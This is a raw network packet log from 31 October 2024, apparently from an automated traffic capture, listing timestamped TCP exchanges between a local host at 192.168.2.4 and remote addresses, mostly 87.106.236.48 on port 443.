                                                                                                                                            Oct 31, 2024 17:12:34.750401974 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.750428915 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.750468969 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.815052986 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.815069914 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.815171957 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.815181971 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.815221071 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.866744995 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.866770029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.867019892 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:34.867034912 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:34.867077112 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.116929054 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.116949081 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.117095947 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.117104053 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.117151022 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.118618011 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.118635893 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.118808985 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.118814945 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.118858099 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.120500088 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.120517969 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.120609999 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.120615959 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.120654106 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.121356964 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.121375084 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.121432066 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.121438980 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.121476889 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.127010107 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.127032042 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.127116919 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.127123117 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.127162933 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.128118992 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.128139019 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.128195047 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.128202915 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.128226995 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.128242970 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.166944027 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.166970968 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.167023897 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.167046070 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.167057037 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.167085886 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.219093084 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.219113111 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.219243050 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.219253063 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.219299078 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.254268885 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.254293919 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.254380941 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.254399061 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.254431963 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.258630991 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.258697987 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:35.283890963 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.283912897 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.284065962 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.284106016 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.284147024 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.335973024 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.335993052 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.336076975 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.336086035 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.336121082 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.371035099 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.371054888 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.371108055 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.371128082 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.371148109 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.371159077 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.400916100 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.400935888 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.400978088 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.400998116 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.401011944 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.401031017 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.401897907 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.401913881 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.401971102 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.401984930 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.402017117 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.454230070 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.454252005 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.454452991 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.454466105 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.454502106 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.489120007 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.489154100 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.489337921 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.489351988 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.489403009 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.518712044 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.518733025 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.518928051 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.518942118 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.518985033 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.570739985 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.570760965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.570930958 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.570947886 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.570998907 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.608997107 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.609018087 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.609200954 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.609210968 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.609258890 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.635495901 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.635513067 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.635634899 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.635648012 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.635687113 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.687341928 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.687360048 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.687483072 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.687511921 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.687571049 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.688359976 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.688375950 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.688437939 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.688446045 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.688477993 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.726109028 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.726128101 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.726222038 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.726248980 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.726290941 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.752696991 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.752721071 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.752969980 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.752981901 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.753024101 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.804552078 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.804572105 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.804688931 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.804722071 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.804796934 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.805901051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.805919886 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.805983067 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.805990934 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.806022882 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.843126059 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.843157053 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.843384981 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.843421936 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.843463898 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.869923115 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.869950056 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.870094061 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.870122910 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.870158911 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.921700954 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.921730995 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.921787024 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.921804905 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.921818972 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.921837091 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.923125029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.923151016 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.923190117 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.923202038 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.923218966 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.923233032 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.960582972 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.960593939 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.960692883 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.960716963 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.960776091 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.987014055 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.987039089 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.987127066 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:35.987157106 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:35.987198114 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.038620949 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.038645029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.038784981 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.038814068 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.038856983 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.039601088 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.039633989 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.039666891 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.039680004 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.039702892 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.039720058 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.077061892 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.077085018 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.077214003 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.077229023 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.077270031 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.103915930 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.103943110 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.104002953 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.104029894 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.104048967 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.104069948 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.155756950 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.155780077 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.155934095 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.155962944 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.156002998 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.156375885 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.156389952 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.156444073 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.156450033 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.156483889 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.194318056 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.194340944 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.194489956 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.194508076 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.194545031 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.220379114 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.220400095 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.220511913 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.220523119 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.220563889 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.221477032 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.221493006 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.221559048 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.221565008 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.221602917 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.272830009 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.272850990 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.272948980 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.272975922 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.273014069 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.273956060 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.273977041 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.274040937 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.274055958 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.274091005 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.311434031 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.311465025 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.311598063 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.311626911 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.311662912 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.337760925 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.337785006 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.337873936 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.337898016 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.337938070 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.380419016 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.380450964 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.380563021 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.380589962 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.380630016 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.389935017 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.389960051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.390033960 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.390042067 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.390078068 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.427828074 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.427876949 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.427939892 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.427966118 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.427997112 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.428015947 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.428525925 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.428570032 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.428597927 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.428603888 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.428626060 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.428652048 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.455857992 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.455919027 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.455976963 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.455997944 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.456015110 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.456033945 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.497773886 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.497802019 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.498006105 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.498027086 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.498086929 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.506900072 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.506922960 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.507006884 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.507019997 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.507055044 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.546201944 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.546255112 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.546300888 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.546313047 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.546331882 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.546355009 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.546387911 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.546431065 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.546449900 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.546459913 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.546478033 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.546498060 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.572146893 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.572181940 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.572223902 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.572232962 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.572254896 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.572271109 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.573373079 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.573395967 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:36.573446989 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:36.573453903 CET4434976187.106.236.48192.168.2.4
